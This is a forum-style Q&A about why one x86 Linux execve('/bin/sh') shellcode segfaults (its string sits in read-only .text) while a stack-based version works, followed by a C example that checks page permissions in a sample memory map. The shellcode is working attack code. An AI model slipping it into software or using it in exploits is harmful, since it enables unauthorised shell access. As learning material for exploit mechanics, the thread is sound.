I've recently read Aleph One's "Smashing the Stack for Fun and Profit" and have been looking at "The Shellcoder's Handbook". I was toying around with the following assembly code:
section .text
global _start
_start:
    jmp short GotoCall      ; jump forward so the CALL below pushes the string's address
shellcode:
    pop ebx                 ; ebx = address of '/bin/shJAAAAKKKK' (the CALL's return address)
    xor eax, eax
    mov [ebx + 7], al       ; NUL-terminate "/bin/sh" (overwrites the 'J')
    mov [ebx + 8], ebx      ; argv[0] = pointer to "/bin/sh" (overwrites "AAAA")
    mov [ebx + 12], eax     ; argv[1] = NULL (overwrites "KKKK")
    mov al, 0x0b            ; sys_execve
    lea ecx, [ebx + 8]      ; ecx = argv
    lea edx, [ebx + 12]     ; edx = envp (points at the NULL)
    int 80h
    xor eax, eax
    mov al, 0x01            ; sys_exit
    int 80h
GotoCall:
    call shellcode
    db '/bin/shJAAAAKKKK'
When I walk through it with GDB I get a seg fault every time I try to write to:
mov [ebx + 7], al
However, when I run this I can pop a root shell without segfaulting:
section .text
global _start
_start:
    xor eax, eax
    push eax                ; NUL terminator for the string
    push 0x68732f2f         ; "//sh"
    push 0x6e69622f         ; "/bin"
    mov ebx, esp            ; ebx = "/bin//sh" (on the stack, which is writable)
    push eax                ; argv[1] = NULL
    push ebx                ; argv[0] = pointer to the string
    mov ecx, esp            ; ecx = argv
    xor edx, edx            ; edx = envp = NULL
    mov al, 0xb             ; sys_execve
    int 80h
Essentially they are doing the same thing (yes, I know they aren't really, but I'm attempting to pop a root shell in both). I'm running on openSUSE 11.4 and I have stack randomization (ASLR) turned off for learning purposes. Any ideas?
You've put your db '/bin/shJAAAAKKKK' string into the .text section, which is normally not writable. If you put it into .data, the crash would go away, but you'll have to get the address of the string in some other way: it would no longer immediately follow the CALL in GotoCall.
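To see the answer's point concretely, here is an added example (not code from either poster) that performs the same page-permission check the kernel makes when the first program faults on mov [ebx + 7], al. It parses a constructed /proc/<pid>/maps-style listing (the addresses, inode and path are made up) and reports whether a store to a given address is allowed. The functions perms_for_addr and is_writable and the SAMPLE_MAPS text are all assumptions of this example.

```c
#include <stdio.h>
#include <string.h>

/* Constructed sample in the format of /proc/<pid>/maps for a small
 * statically linked 32-bit binary (addresses, inode and path are made up).
 * First line: the .text segment, mapped read + execute only.
 * Second line: the .data segment, mapped read + write. */
static const char SAMPLE_MAPS[] =
    "08048000-08049000 r-xp 00000000 08:01 1234       /home/user/shell\n"
    "08049000-0804a000 rw-p 00001000 08:01 1234       /home/user/shell\n"
    "bffdf000-c0000000 rw-p 00000000 00:00 0          [stack]\n";

/* Look up the permission string ("r-xp", "rw-p", ...) of the mapping that
 * contains addr. Copies it into perms (at least 5 bytes) and returns 1,
 * or returns 0 if no mapping contains the address. */
int perms_for_addr(const char *maps, unsigned long addr, char *perms)
{
    const char *line = maps;
    while (*line) {
        unsigned long lo, hi;
        char p[5];
        /* Each line starts "start-end perms ..."; %lx stops at the '-'. */
        if (sscanf(line, "%lx-%lx %4s", &lo, &hi, p) == 3 &&
            addr >= lo && addr < hi) {
            memcpy(perms, p, 5);
            return 1;
        }
        const char *nl = strchr(line, '\n');
        if (!nl)
            break;
        line = nl + 1;
    }
    return 0;
}

/* 1 if a store to addr would succeed as far as page permissions go,
 * 0 if it would fault (unmapped, or mapped without the 'w' bit). */
int is_writable(const char *maps, unsigned long addr)
{
    char perms[5];
    return perms_for_addr(maps, addr, perms) && perms[1] == 'w';
}

int main(void)
{
    /* Where the string would sit if placed in .text (first region)
     * versus .data (second region); both offsets are made up. */
    unsigned long in_text = 0x08048080UL, in_data = 0x08049010UL;
    printf("%#lx writable: %d\n", in_text, is_writable(SAMPLE_MAPS, in_text));
    printf("%#lx writable: %d\n", in_data, is_writable(SAMPLE_MAPS, in_data));
    return 0;
}
```

In a live debugging session the real table comes from `info proc mappings` in GDB or `cat /proc/<pid>/maps`; a string assembled into .text lands in the r-xp region, so the store faults, while a string in .data (or on the stack, as in the second program) lands in an rw-p region and the store goes through.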